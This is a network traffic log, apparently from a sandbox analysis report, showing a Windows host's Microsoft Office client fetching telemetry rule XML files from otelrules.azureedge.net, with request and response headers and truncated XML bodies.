                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                104 | 192.168.2.5 | 50073 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:00 UTC | 192 | OUT | GET /rules/rule700350v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:00 GMT
                                Content-Type: text/xml
                                Content-Length: 1360
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                ETag: "0x8DC582BDD74D2EC"
                                x-ms-request-id: 9b9719a8-201e-0033-3491-3fb167000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165200Z-174f7845968ljs8phC1EWRe6en0000001630000000008er1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                105 | 192.168.2.5 | 50074 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:00 UTC | 192 | OUT | GET /rules/rule700351v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1397
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BDFD43C07"
                                x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f78459688l8rvhC1EWRtzr00000000kt000000000ggte
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                106 | 192.168.2.5 | 50075 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:00 UTC | 192 | OUT | GET /rules/rule703901v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1427
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE56F6873"
                                x-ms-request-id: c562a2d5-001e-0082-3a33-445880000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f7845968glpgnhC1EWR7uec00000016d0000000008eez
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC | 1427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                107 | 192.168.2.5 | 50076 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:00 UTC | 192 | OUT | GET /rules/rule703900v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1390
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                ETag: "0x8DC582BE3002601"
                                x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f78459684bddphC1EWRbht4000000160g000000004b16
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC | 1390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                108 | 192.168.2.5 | 50064 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:01 UTC | 192 | OUT | GET /rules/rule702951v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:01 GMT
                                Content-Type: text/xml
                                Content-Length: 1405
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE12B5C71"
                                x-ms-request-id: 6df10516-501e-005b-5e01-42d7f7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165201Z-174f7845968xr5c2hC1EWRd0hn0000000r2000000000ck4h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:01 UTC | 1405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                109 | 192.168.2.5 | 50080 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:03 UTC | 192 | OUT | GET /rules/rule701500v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:03 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1364
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB6AD293"
                                x-ms-request-id: 20c5b054-901e-0016-7725-44efe9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f7845968swgbqhC1EWRmnb4000000168000000000uba1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:03 UTC | 1364 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                110 | 192.168.2.5 | 50079 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:03 UTC | 192 | OUT | GET /rules/rule702800v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:03 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1354
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                ETag: "0x8DC582BE0662D7C"
                                x-ms-request-id: 80f7b3d9-401e-0083-53dd-41075c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f7845968cpnpfhC1EWR3afc00000015sg00000000n9v2
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:03 UTC | 1354 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                111 | 192.168.2.5 | 50077 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:03 UTC | 192 | OUT | GET /rules/rule701501v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:03 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1401
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                ETag: "0x8DC582BE2A9D541"
                                x-ms-request-id: e78111bd-301e-0020-4cf9-446299000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f7845968zgtf6hC1EWRqd8s0000000z3000000000q887
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:03 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                112 | 192.168.2.5 | 50078 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:03 UTC | 192 | OUT | GET /rules/rule702801v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:04 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:03 GMT
                                Content-Type: text/xml
                                Content-Length: 1391
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                ETag: "0x8DC582BDF58DC7E"
                                x-ms-request-id: e071f9fb-501e-00a0-6a82-439d9f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165203Z-174f78459685726chC1EWRsnbg000000169g000000009cas
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:04 UTC | 1391 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                113 | 192.168.2.5 | 50081 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:04 UTC | 192 | OUT | GET /rules/rule703351v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:04 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:04 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                ETag: "0x8DC582BDCDD6400"
                                x-ms-request-id: bc5dfdd1-701e-005c-6a03-45bb94000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165204Z-174f7845968jrjrxhC1EWRmmrs000000169000000000mqd1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:04 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                114 | 192.168.2.5 | 50083 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:06 UTC | 192 | OUT | GET /rules/rule701801v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:06 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                ETag: "0x8DC582BDC2EEE03"
                                x-ms-request-id: a8b72aac-901e-005b-059f-432005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968jrjrxhC1EWRmmrs00000016eg0000000015ac
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:06 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                115 | 192.168.2.5 | 50085 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:06 UTC | 192 | OUT | GET /rules/rule703500v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:06 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                ETag: "0x8DC582BDF497570"
                                x-ms-request-id: 0ad7255b-c01e-00ad-65a2-42a2b9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968ljs8phC1EWRe6en00000015yg00000000tf72
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:06 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                116 | 192.168.2.5 | 50082 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:06 UTC | 192 | OUT | GET /rules/rule703350v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:07 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                ETag: "0x8DC582BDF1E2608"
                                x-ms-request-id: eea98567-901e-007b-3159-44ac50000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968pght8hC1EWRyvxg000000097g00000000vv2a
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:07 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                117 | 192.168.2.5 | 50084 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:06 UTC | 192 | OUT | GET /rules/rule703501v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:07 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:06 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                ETag: "0x8DC582BE8C605FF"
                                x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165206Z-174f7845968xr5c2hC1EWRd0hn0000000r2g00000000apwv
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:07 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                118 | 192.168.2.5 | 50086 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:06 UTC | 192 | OUT | GET /rules/rule701800v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:07 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:07 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                ETag: "0x8DC582BEA414B16"
                                x-ms-request-id: 2554c198-401e-005b-1ab4-439c0c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165207Z-174f7845968xlwnmhC1EWR0sv8000000161g00000000ca4h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:07 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                119 | 192.168.2.5 | 50087 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:09 UTC | 192 | OUT | GET /rules/rule701051v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                ETag: "0x8DC582BE1CC18CD"
                                x-ms-request-id: fcce73e1-901e-008f-60e1-4167a6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968swgbqhC1EWRmnb4000000168000000000ubhg
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC | 1399 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                120 | 192.168.2.5 | 50091 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:09 UTC | 192 | OUT | GET /rules/rule702301v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                ETag: "0x8DC582BE976026E"
                                x-ms-request-id: ae63cf80-d01e-00ad-1daa-42e942000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968vqt9xhC1EWRgten000000169g0000000085nk
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC | 1399 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                121 | 192.168.2.5 | 50088 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:09 UTC | 192 | OUT | GET /rules/rule701050v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB256F43"
                                x-ms-request-id: 6460b669-f01e-00aa-725a-448521000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968cpnpfhC1EWR3afc00000015rg00000000rmnr
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC | 1362 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                122 | 192.168.2.5 | 50090 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:09 UTC | 192 | OUT | GET /rules/rule702751v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:09 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB866CDB"
                                x-ms-request-id: 3b4ace6b-101e-0046-10ef-4491b0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968kvnqxhC1EWRmf3g0000000sx000000000t6a9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:09 UTC | 1403 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                123 | 192.168.2.5 | 50089 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:09 UTC | 192 | OUT | GET /rules/rule702750v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:10 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:09 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                ETag: "0x8DC582BE5B7B174"
                                x-ms-request-id: c03fc84f-d01e-0065-80f3-44b77a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165209Z-174f7845968ljs8phC1EWRe6en000000161000000000gsp0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:10 UTC | 1366 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                124 | 192.168.2.5 | 50094 | 13.107.246.63 | 443
